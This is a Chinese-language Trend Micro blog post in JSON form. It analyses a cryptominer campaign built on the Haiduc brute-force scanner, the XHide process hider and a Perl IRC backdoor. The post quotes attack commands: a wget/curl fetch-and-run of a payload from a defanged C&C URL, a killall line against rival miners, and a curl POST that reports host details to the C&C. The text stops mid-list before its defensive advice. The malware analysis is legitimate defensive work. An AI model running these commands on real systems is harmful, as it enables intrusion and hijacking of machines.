{"id":63218,"date":"2020-02-17T09:00:00","date_gmt":"2020-02-17T01:00:00","guid":{"rendered":"https:\/\/blog.trendmicro.com.tw\/?p=63218"},"modified":"2020-02-05T17:54:57","modified_gmt":"2020-02-05T09:54:57","slug":"%e6%8c%96%e7%a4%a6%e7%a8%8b%e5%bc%8f%e4%bd%bf%e7%94%a8-haiduc-%e9%a7%ad%e5%ae%a2%e5%b7%a5%e5%85%b7%e5%92%8c-xhide-%e6%87%89%e7%94%a8%e7%a8%8b%e5%bc%8f%e9%9a%b1%e8%97%8f%e5%b7%a5%e5%85%b7%e6%9a%b4","status":"publish","type":"post","link":"https:\/\/blog.trendmicro.com.tw\/?p=63218","title":{"rendered":"\u6316\u7926\u7a0b\u5f0f\u4f7f\u7528 Haiduc \u99ed\u5ba2\u5de5\u5177\u548c Xhide \u61c9\u7528\u7a0b\u5f0f\u96b1\u85cf\u5de5\u5177,\u66b4\u529b\u767b\u5165\u96fb\u8166\u8207\u4f3a\u670d\u5668"},"content":{"rendered":"\n

\u8da8\u52e2\u79d1\u6280\u67b6\u8a2d\u7684\u67d0\u500b\u8a98\u6355\u74b0\u5883\u5728\u4e00\u500b\u906d\u5230\u5165\u4fb5\u7684\u7db2\u7ad9 (hxxps:\/\/upajmeter[.]com\/assets\/.style\/min) \u4e0a\u5075\u6e2c\u5230\u865b\u64ec\u52a0\u5bc6\u8ca8\u5e63\u6316\u7926\u653b\u64ca\u3002\u6b79\u5f92\u5728\u8a72\u7db2\u7ad9\u4e0a\u63d2\u5165\u4e00\u4e9b\u6307\u4ee4\u4f86\u4e0b\u8f09\u5176\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c (shell script)\uff0c\u4e5f\u5c31\u662f\u8da8\u52e2\u79d1\u6280\u5075\u6e2c\u5230\u7684 Trojan.SH.MALXMR.UWEJS<\/a>\u3002\u9019\u500b\u6316\u7926\u7a0b\u5f0f\u7531\u591a\u500b\u5143\u4ef6\u6240\u7d44\u6210\uff0c\u5305\u62ec\u4e0d\u540c\u7684 Perl \u548c Bash \u8173\u672c\u3001\u4e8c\u9032\u4f4d\u6a94\u6848\u3001\u61c9\u7528\u7a0b\u5f0f\u96b1\u85cf\u5de5\u5177 Xhide \u4ee5\u53ca\u4e00\u500b\u6383\u7784\u5de5\u5177\u3002\u6b64\u6316\u7926\u7a0b\u5f0f\u5728\u6563\u5e03\u6642\u6703\u6383\u7784\u96fb\u8166\u662f\u5426\u542b\u6709\u67d0\u4e9b\u6f0f\u6d1e\uff0c\u4e14\u6703\u5229\u7528\u66b4\u529b\u767b\u5165\u65b9\u5f0f (\u4e3b\u8981\u662f\u4f7f\u7528\u9810\u8a2d\u7684\u767b\u5165\u5e33\u865f\u548c\u5bc6\u78bc) \u4f86\u5165\u4fb5\u96fb\u8166\u3002<\/p>\n\n\n\n

\"\"\/<\/figure>\n\n\n\n

\u6839\u64da\u6211\u5011\u5c0d\u8a72\u5a01\u8105\u7684\u5206\u6790\u986f\u793a\uff0c\u60e1\u610f\u6a94\u6848\u6703\u5728\u4e00\u5929\u7576\u4e2d\u57f7\u884c\u591a\u6b21\uff0c\u5b9a\u671f\u5c07\u53d7\u611f\u67d3\u96fb\u8166\u7684\u6700\u65b0\u72c0\u6cc1\u56de\u5831\u7d66\u5e55\u5f8c\u64cd\u7e31\n(C&C) \u4f3a\u670d\u5668\u3002\u611f\u67d3\u904e\u7a0b\u7576\u4e2d\u4f7f\u7528\u7684\u6307\u4ee4\u5217\u8173\u672c\u4e5f\u6703\u4e0b\u8f09\u4e00\u4e9b\u5305\u542b\u5176\u6383\u7784\u5de5\u5177\u3001\u57f7\u884c\u7a0b\u5e8f\u96b1\u85cf\u5de5\u5177\uff0c\u4ee5\u53ca\u6700\u7d42\u60e1\u610f\u6a94\u6848\u7684\u58d3\u7e2e\u6a94\u3002<\/p>\n\n\n\n

\u9664\u6b64\u4e4b\u5916\uff0c\u9019\u9805\u5a01\u8105\u9084\u6703\u5229\u7528\u4e00\u500b\u57f7\u884c\u7a0b\u5e8f\u96b1\u85cf\u5de5\u5177\u4f86\u96b1\u85cf\u6316\u7926\u7a0b\u5f0f\u7684\u4e8c\u9032\u4f4d\u6a94\u6848\uff0c\u8b93\u4e00\u822c\u4f7f\u7528\u8005\u66f4\u4e0d\u5bb9\u6613\u6ce8\u610f\u5230\u6b79\u5f92\u7684\u6316\u7926\u6d3b\u52d5\uff0c\u9802\u591a\u53ea\u6703\u767c\u73fe\u96fb\u8166\u6548\u80fd\u8b8a\u6162\uff0c\u4ee5\u53ca\u67d0\u4e9b\u53ef\u7591\u7684\u7db2\u8def\u6d41\u91cf\u3002\u9019\u662f\u6b79\u5f92\u7528\u4f86\u63a9\u84cb\u5176\u6383\u7784\u3001\u66b4\u529b\u767b\u5165\u8207\u6316\u7926\u6d3b\u52d5\u7684\u4e00\u7a2e\u5df2\u77e5<\/a>\u624b\u6cd5\u3002<\/p>\n\n\n\n\n\n\n\n

\u8001\u5de5\u5177\u7684\u8cfa\u9322\u65b0\u82b1\u62db\uff1a\u60e1\u610f\u7db2\u5740\u4f7f\u7528\u5df2\u6709 17 \u5e74\u6b77\u53f2\u7684 XHide \u4f86\u6563\u64ad Shellbot \u548c XMRig \u60e1\u610f\u7a0b\u5f0f<\/strong><\/a><\/p>\n\n\n\n

\u6211\u5011\u767c\u73fe\u8a72\u5a01\u8105\u6703\u6383\u7784\u958b\u653e\u7684\u9023\u63a5\u57e0\uff0c\u7136\u5f8c\u66b4\u529b\u767b\u5165\u5bc6\u78bc\u5f37\u5ea6\u4e0d\u8db3\u7684\u7cfb\u7d71\uff0c\u4e26\u5728\u7cfb\u7d71\u4e0a\u5b89\u88dd\u4e00\u500b\u9580\u7f85\u5e63\n(Monero) \u6316\u7926\u7a0b\u5f0f\uff0c\u6700\u5f8c\u4e0b\u8f09\u4e00\u500b\u4ee5 Perl \u64b0\u5beb\u7684 IRC \u5f8c\u9580\u7a0b\u5f0f\u3002\u99ed\u5ba2\u5229\u7528 XHide Process Faker \u4f86\u96b1\u85cf\u6316\u7926\u7a0b\u5f0f\u7684\u57f7\u884c\u7a0b\u5e8f\uff0c\u9019\u662f\u4e00\u500b\u64c1\u6709\n17 \u5e74\u6b77\u53f2\u7684\u958b\u653e\u539f\u59cb\u78bc\u5de5\u5177\uff0c\u53ef\u7528\u4f86\u8b8a\u9020\u57f7\u884c\u7a0b\u5e8f\u7684\u540d\u7a31\u3002<\/p>\n\n\n\n

\u611f\u67d3\u904e\u7a0b<\/strong><\/h3>\n\n\n\n

\u99ed\u5ba2\u4e00\u958b\u59cb\u6703\u5148\u5229\u7528\u7cfb\u7d71\u5bc6\u78bc\u5f37\u5ea6\u4e0d\u8db3\u6216\u4f7f\u7528\u9810\u8a2d\u5bc6\u78bc\u7684\u5f31\u9ede\u4f86\u66b4\u529b\u767b\u5165\u7cfb\u7d71\u3002\u63a5\u8457\uff0c\u5c31\u6703\u5728\u5df2\u767b\u5165\u7684\u7cfb\u7d71\u4e0a\u57f7\u884c\u4e00\u9053\u6307\u4ee4\uff1a<\/p>\n\n\n\n

cd \/tmp;wget hxxps:\/\/upajmeter[.]com\/assets\/.style\/min;curl\n-O hxxps:\/\/upajmeter[.]com\/assets\/.style\/min;chmod +x min;perl min;rm -rf min*<\/code><\/p>\n\n\n\n

\u9019\u500b\u7b2c\u4e00\u968e\u6bb5\u6a94\u6848\u300cmin\u300d\n(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba Trojan.Perl.MALXMR.UWEJS<\/a>) \u6703\u4e0b\u8f09\u53e6\u4e00\u500b\u6a94\u6848\u300cmin.sh\u300d(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70baTrojan.SH.MALXMR.UWEJS<\/a>)\uff0c\u4e5f\u5c31\u662f\u6b64\u5a01\u8105\u7684\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c\uff0c\u5b83\u6703\u5b89\u88dd\u6b64\u5a01\u8105\u7684\u5404\u9805\u5143\u4ef6\u3002\u5728\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c\u57f7\u884c\u904e\u5f8c\uff0c\u99ed\u5ba2\u6703\u8a66\u5716\u5c07\u7cfb\u7d71\u4e0a\u539f\u672c\u6b63\u5728\u57f7\u884c\u7684\u5404\u7a2e\u5df2\u77e5\u6316\u7926\u7a0b\u5f0f\u5168\u90e8\u7d42\u6b62\uff1a<\/p>\n\n\n\n

killall -9 rand rx rd tsm tsm2 haiduc a\nsparky.sh 2238Xae b f i p y rsync ps go x s b run idle minerd crond yam xmr\npython cron ntpd start start.sh libssl sparky.sh<\/code><\/p>\n\n\n\n

\u9664\u6b64\u4e4b\u5916\uff0c\u6307\u4ee4\u5217\u8173\u672c\u6703\u518d\u4e0b\u8f09\u4e26\u57f7\u884c\u5169\u500b\u6a94\u6848\u4e0b\u8f09\u5de5\u5177\uff1a\u300ccron.sh\u300d\u548c\u300cnano.sh\u300d\n(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba Trojan.SH.MALXMR.UWEJT<\/a>)\uff0c\u9019\u5169\u500b\u5de5\u5177\u6bcf\u5929\u90fd\u6703\u5b9a\u671f\u4e0d\u65b7\u57f7\u884c\uff0c\u5206\u5225\u662f\u6bcf\u4e00\u5c0f\u6642\u548c\u6bcf 30 \u5206\u9418\u57f7\u884c\u4e00\u6b21\u3002\u5b83\u5011\u6703\u5728\u7cfb\u7d71\u690d\u5165\u300crcmd.sh\u300d(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70baTrojan.SH.MALXMR.UWEJU<\/a>)\uff0c\u8a72\u8173\u672c\u8ca0\u8cac\u5b9a\u671f\u900f\u904e HTTP \u8acb\u6c42\u5411 C&C \u4f3a\u670d\u5668\u56de\u5831\u53d7\u611f\u67d3\u96fb\u8166\u7684\u72c0\u6cc1\uff1a<\/p>\n\n\n\n

curl -d\n\"info=POST&data=SERVER---> $(whoami)@$SERVERIP <\/code>
\nDATE---> $(date) <\/code>
\nSERV---> $(uname -a) ===> $(nproc)\nPROCESORS ===> VIDEO $(lspci | grep VGA) ===>$(ps x|grep bash)\"\nhxxp:\/\/upajmeter[.]com\/assets\/.style\/remote\/info.php > \/dev\/null<\/code><\/p>\n\n\n\n

\u58d3\u7e2e\u6a94\u6848<\/em><\/strong><\/h4>\n\n\n\n

\u6b64\u5916\uff0c\u8a72\u6307\u4ee4\u5217\u8173\u672c\u9084\u6703\u4e0b\u8f09\u6316\u7926\u7a0b\u5f0f\u7684\u58d3\u7e2e\u6a94\u6848\u300cmonero.tgz\u300d(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba\nTrojan.Linux.MALXMR.UWEJS<\/a>) \u4e26\u89e3\u958b\u58d3\u7e2e\u6a94\u4e2d\u7684\u5167\u5bb9\u4f86\u57f7\u884c\u3002\u58d3\u7e2e\u6a94\u5167\u542b\u6709\u6316\u7926\u7a0b\u5f0f\u7684\u4e8c\u9032\u4f4d\u6a94\u6848\uff0c\u53ef\u900f\u904e\u6a94\u6848\u4e2d\u5305\u542b\u7684\u6307\u4ee4\u5217\u8173\u672c\u53ca\nPerl \u8173\u672c\u4f86\u57f7\u884c\u3002<\/p>\n\n\n\n

\u6b64\u58d3\u7e2e\u6a94\u7684\u5167\u5bb9\u4e3b\u8981\u662f\u7d44\u614b\u8a2d\u5b9a\u6a94\u6848\u4ee5\u53ca\u5404\u5143\u4ef6\u57f7\u884c\u6240\u9700\u7684\u6a94\u6848\uff0c\u5982\uff1a\u300cconfig.txt\u300d\u3001\u300ccpu.txt\u300d\u3001\u300ch32\u300d(32\n\u4f4d\u5143 Xhide \u7a0b\u5f0f)\u3001\u300ch64\u300d(64 \u4f4d\u5143 Xhide \u7a0b\u5f0f)\u3001\u300cpools.txt\u300d\u3001\u300crun\u300d\u3001\u300cstartMSR\u300d\u3001\u300cx\u300d\u3001\u300cx.pl\u300d\u3001\u300cxmr-stak\u300d\u4ee5\u53ca\u300cxmrig\u300d\u3002Xhide\n\u7a0b\u5f0f\u53ef\u7528\u4f86\u96b1\u85cf\u6316\u7926\u7a0b\u5f0f\u7684\u57f7\u884c\u7a0b\u5e8f (\u900f\u904e\u300c-bash\u300d\u4f86\u4fee\u6539\u57f7\u884c\u7a0b\u5e8f\u540d\u7a31)\u3002<\/p>\n\n\n\n

\u63a5\u4e0b\u4f86\uff0c\u4e3b\u8981\u6307\u4ee4\u5217\u8173\u672c\u6703\u4e0b\u8f09\u5305\u542b\u6383\u7784\u5de5\u5177\u7684\u58d3\u7e2e\u6a94\u300csslm.tgz\u300d(\u8da8\u52e2\u79d1\u6280\u547d\u540d\u70ba\nTrojan.Linux.SSHBRUTE.UWEJS<\/a>) \u4e26\u89e3\u958b\u5176\u4e2d\u7684\u6383\u7784\u5de5\u5177\u4f86\u57f7\u884c\u3002\u58d3\u7e2e\u6a94\u4e2d\u542b\u6709\nTelnet\/SSH \u6383\u7784\u5de5\u5177\u3001\u7528\u4f86\u57f7\u884c\u8a72\u5de5\u5177\u7684\u6307\u4ee4\u5217\u8173\u672c\u8207 Perl \u8173\u672c\uff0c\u4ee5\u53ca\u6383\u7784\u904e\u7a0b\u7576\u4e2d\u6703\u7528\u5230\u7684\u5bc6\u78bc\u6e05\u55ae\u3002<\/p>\n\n\n\n

\u7d93\u7531 C&C \u5e55\u5f8c\u64cd\u63a7\uff0c\u4f7f\u7528\u4ee5 Perl \u64b0\u5beb\u7684 Shellbot \u653b\u64ca\u4f01\u696d<\/strong><\/a><\/strong><\/strong><\/p>\n\n\n\n

\u6839\u64da\u6211\u5011\u767c\u73fe\uff0c\u4e00\u500b\u540d\u70ba\u300chaiduc\u300d(\u7f85\u99ac\u5c3c\u4e9e\u6587\uff0c\u610f\u70ba\u300c\u4e0d\u6cd5\u4e4b\u5f92\u300d)\n\u7684\u99ed\u5ba2\u96c6\u5718 (\u4ee5\u8a72\u5718\u9ad4\u6240\u4f7f\u7528\u7684\u5de5\u5177\u70ba\u540d) \u5c08\u9580\u4f7f\u7528 Perl Shellbot \u6240\u88fd\u4f5c\u7684 IRC \u6bad\u5c4d\u75c5\u6bd2 (bot) \u4f86\u653b\u64ca\u4f01\u696d\u3002<\/p>\n\n\n\n

\u524d\u8ff0\u7684\u6383\u7784\u5de5\u5177\u58d3\u7e2e\u6a94\u5167\u542b\u6709\u4ee5\u4e0b\u6a94\u6848\uff1a\u300c.pass\u300d(\u96a8\u6a5f\u516c\u5171\nIP \u5340\u6bb5\u77ed\u5bc6\u78bc\u6e05\u55ae)\u3001\u300cpass\u300d(\u79c1\u4eba IP \u5340\u6bb5\u9577\u5bc6\u78bc\u6e05\u55ae)\u3001\u300clibssl\u300d(\u4ee5 UPX \u58d3\u7e2e\u7684 Haiduc \u6383\u7784\u5de5\u5177)\u3001\u300csparky.sh\u300d\u3001\u300cstart\u300d\u3001\u300cstart.pl\u300d\u4ee5\u53ca\u300cstart.sh\u300d\u3002<\/p>\n\n\n\n

\u8a72\u6383\u7784\u5de5\u5177\u6703\u8a66\u5716\u611f\u67d3\u4e26\u638c\u63a7\u79c1\u4eba\nIP \u5340\u6bb5\u5167\u7684\u88dd\u7f6e (\u6b64\u5916\u4e5f\u6703\u8a66\u5716\u611f\u67d3\u53d7\u5bb3\u96fb\u8166\u6240\u5728\u5340\u57df\u7db2\u8def\u5167\u7684\u6240\u6709\u88dd\u7f6e)\uff0c\u5229\u7528\u4e00\u500b\u542b\u6709 3,637 \u7d44\u4f7f\u7528\u540d\u7a31\u548c\u5bc6\u78bc\u7684\u6e05\u55ae\u4f86\u8a66\u5716\u66b4\u529b\u767b\u5165\u96fb\u8166\u3002\u6b64\u5916\uff0c\u5b83\u9084\u6703\u4f7f\u7528\u53e6\u4e00\u500b\u77ed\u5bc6\u78bc\u6e05\u55ae\u4f86\u8a66\u5716\u611f\u67d3\u516c\u5171\nIP \u5340\u6bb5\u300c{0-216 \u4e4b\u9593\u7684\u96a8\u6a5f\u6578\u5b57}.0.0.0\/8\u300d\u5167\u7684\u88dd\u7f6e\u3002\u6839\u64da\u5176\u4f7f\u7528\u7684\u5e33\u865f\u5bc6\u78bc\u4f86\u770b\uff0c\u6b64\u653b\u64ca\u4e3b\u8981\u91dd\u5c0d\u7684\u662f\u8cc7\u6599\u5eab\u3001\u5132\u5b58\u88dd\u7f6e\u3001\u904a\u6232\u4ee5\u53ca\u6316\u7926\u5c08\u7528\u8a2d\u5099\u76f8\u95dc\u7684\u4f3a\u670d\u5668\u3002<\/p>\n\n\n\n

\u653b\u64ca\u4e00\u65e6\u5f97\u901e\uff0c\u99ed\u5ba2\u5c31\u80fd\u5229\u7528\u524d\u8ff0\u7684\u6307\u4ee4\u5728\u7cfb\u7d71\u4e0a\u6316\u7926\u3002<\/p>\n\n\n\n

\u4fdd\u8b77\u88dd\u7f6e\uff0c\u9632\u7bc4\u865b\u64ec\u52a0\u5bc6\u8ca8\u5e63\u6316\u7926\u5a01\u8105<\/strong><\/h3>\n\n\n\n

\u9019\u8d77\u865b\u64ec\u52a0\u5bc6\u8ca8\u5e63\u6316\u7926\u653b\u64ca\u5e55\u5f8c\u7684\u99ed\u5ba2\u96c6\u5718\u7d50\u5408\u4e86\nHaiduc \u548c Xhide \u5169\u500b\u904e\u53bb\u66fe\u7d93<\/a>\u76f8\u7576\u77e5\u540d\u7684\u5de5\u5177\u4f86\u5f9e\u4e8b\u60e1\u610f\u6d3b\u52d5\u3002\u5229\u7528\u9019\u4e9b\u5de5\u5177\uff0c\u518d\u914d\u5408\u5bc6\u78bc\u6e05\u55ae\u4f86\u66b4\u529b\u767b\u5165\u5bc6\u78bc\u5f37\u5ea6\u4e0d\u8db3\u7684\u7cfb\u7d71\uff0c\u5c31\u80fd\u8eb2\u907f\u50b3\u7d71\u7db2\u8def\u8cc7\u5b89\u89e3\u6c7a\u65b9\u6848\u7684\u5075\u6e2c\u3002\u4e0d\u50c5\u5982\u6b64\uff0c\u50cf\u9019\u6a23\u7684\u60e1\u610f\u7a0b\u5f0f\u9084\u53ef\u80fd\u5f71\u97ff\u7cfb\u7d71\u6548\u80fd\uff0c\u4e26\u8b93\u4f7f\u7528\u8005\u66b4\u9732\u65bc\u66f4\u591a\u5176\u4ed6\u985e\u578b\u7684\u5165\u4fb5\u3002<\/p>\n\n\n\n

\u96d6\u7136\u6211\u5011\u5c1a\u672a\u770b\u5230\u8a72\u96c6\u5718\u767c\u52d5\u5927\u898f\u6a21\u7684\u653b\u64ca\uff0c\u4f46\u4f7f\u7528\u8005\u4ecd\u61c9\u63a1\u53d6\u4e00\u4e9b\u9632\u8b77\u63aa\u65bd\u4f86\u9632\u7bc4\u4efb\u4f55\u6f5b\u5728\u7684\u653b\u64ca\uff0c\u5305\u62ec\uff1a<\/p>\n\n\n\n